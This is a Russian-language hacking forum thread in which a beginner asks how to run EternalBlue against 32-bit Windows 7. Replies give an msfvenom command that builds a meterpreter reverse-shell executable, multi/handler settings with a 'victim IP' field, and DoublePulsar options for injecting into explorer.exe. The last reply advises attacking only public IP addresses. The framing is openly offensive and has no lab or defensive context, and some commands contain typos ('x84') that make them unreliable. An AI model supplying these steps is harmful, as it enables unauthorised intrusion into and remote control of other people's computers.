Проблема Kali Linux: Eternalblue x86

Sagain2

Sagain2

New member
30.04.2019
4
0
(Ребята, только не бейте, я новичек)
Даров, хацкеры. У меня тут возник вопрос. Большая часть эксплоитов в metasploit-framework заточены под windows (7) x64
Теперь встречный вопрос, есть ли эксплоит для windows 7 x86? Пол инета облазил не нашел.
Ну или есть его заменители?
 
R

rdh_x

Well-known member
26.03.2018
48
3
Генеришь нагрузку
Bash:
msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.X.X >> payload.exe
Далее в msfconsole
Bash:
use exploit/multi/handler
set lhost <твой ip>
set rhost <ip жертвы>
set payload windows/meterpreter/reverse_tcp
run
 
R

rdh_x

Well-known member
26.03.2018
48
3
Прошу прощения, изначально подумал что неправильно понял вопрос и удалил свой правильный ответ.

Для 32-бит есть Doublepulsar, в настройках сплоита
Код:
set targetarcheticture x84
И нужно изменить processinject, попробуйте поэксперементировать с разными процессами, я пробовал explorer.exe но иногда соединение падало.
Код:
set processinject explorer.exe
Также на некоторых процессах нельзя повысить привилегии.
И соответственно вместо
Код:
set payload windows/x64/meterpreter/reverse_tcp
Нужно
Код:
set payload windows/meterpreter/reverse_tcp
 
s unity

s unity

Well-known member
18.09.2019
118
11
Прошу прощения, изначально подумал что неправильно понял вопрос и удалил свой правильный ответ.

Для 32-бит есть Doublepulsar, в настройках сплоита
Код:
set targetarcheticture x84
И нужно изменить processinject, попробуйте поэксперементировать с разными процессами, я пробовал explorer.exe но иногда соединение падало.
Код:
set processinject explorer.exe
Также на некоторых процессах нельзя повысить привилегии.
И соответственно вместо
Код:
set payload windows/x64/meterpreter/reverse_tcp
Нужно
Код:
set payload windows/meterpreter/reverse_tcp
В мсфконсоли нет даблпульсара "из коробки". Нужно идти на гитхаб и оттуда брать. Вообще лучше загуглить куда его кидать храниться и как использовать.
 
s unity

s unity

Well-known member
18.09.2019
118
11
Знаешь че скажу, забей КУЙ на это. Почти все пейлоды работают только в локалке. С пробросом портов за nat такоооой геморой.... что это не стоит того. Можно пробовать бомбить ТОЛЬКО по белым ип.
Но раз на то пошло, то где ты там увидел, что все идет под x64?! Наоборот x64 прям редко. Вообще этерналблю и туда и туда, просто нужно заходить в exploit и читать подробную инфу типа:
#show info
#show payloads (список нагрузок, там и х86, там и х64)
#show targets (в основном список доступных ОС)
# и так далее.. почти каждая строчка это изменяемый параметр.

Вообще советую познакомиться с SEARCHSPLOIT.
 
Мы в соцсетях: